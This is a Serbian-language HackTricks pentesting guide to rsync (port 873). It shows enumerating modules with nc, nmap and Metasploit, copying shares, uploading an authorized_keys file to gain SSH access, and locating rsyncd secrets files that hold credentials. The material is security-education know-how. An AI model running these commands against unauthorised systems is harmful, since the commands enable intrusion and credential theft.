6.4 KiB
873 - Pentesting Rsync
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Osnovne informacije
Sa wikipedia:
rsync je alatka za efikasno transferisanje i sinhronizaciju fajlova između računara i eksternog hard diska i između računara u mreži tako što upoređuje vreme modifikacije i veličine fajlova.[3] Često se koristi na Unix-sličnim operativnim sistemima. Rsync algoritam je vrsta delta enkodiranja i koristi se za minimiziranje korišćenja mreže. Zlib se može koristiti za dodatno kompresovanje podataka,[3] a SSH ili stunnel se mogu koristiti za bezbednost.
Podrazumevani port: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Prebrojavanje
Baner i ručna komunikacija
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Nabrajanje deljenih fascikli
Rsync moduli se prepoznaju kao deljeni direktorijumi koji mogu biti zaštićeni lozinkama. Da biste identifikovali dostupne module i proverili da li zahtevaju lozinke, koriste se sledeće komande:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Budite svesni da neki deljeni resursi možda neće biti prikazani na listi, što ih može sakriti. Takođe, pristup nekim deljenim resursima može biti ograničen na određene poverljive podatke, što se može videti kroz poruku "Pristup odbijen".
Brute Force
Ručna upotreba Rsync-a
Nakon dobijanja liste modula, akcije zavise od toga da li je potrebna autentifikacija. Bez autentifikacije, prikazivanje i kopiranje fajlova sa deljenog foldera na lokalni direktorijum se postiže kroz:
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
Ovaj proces rekurzivno prenosi fajlove, čuvajući njihove atribute i dozvole.
Sa poverljivim podacima, listanje i preuzimanje fajlova iz deljene fascikle se može obaviti na sledeći način, gde će se pojaviti zahtev za unos lozinke:
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
Da biste prebacili sadržaj, kao što je datoteka authorized_keys za pristup, koristite:
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
Da biste pronašli konfiguracionu datoteku rsyncd, izvršite:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Unutar ovog fajla, parametar secrets file može ukazivati na fajl koji sadrži korisnička imena i lozinke za rsyncd autentifikaciju.
Reference
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu u HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.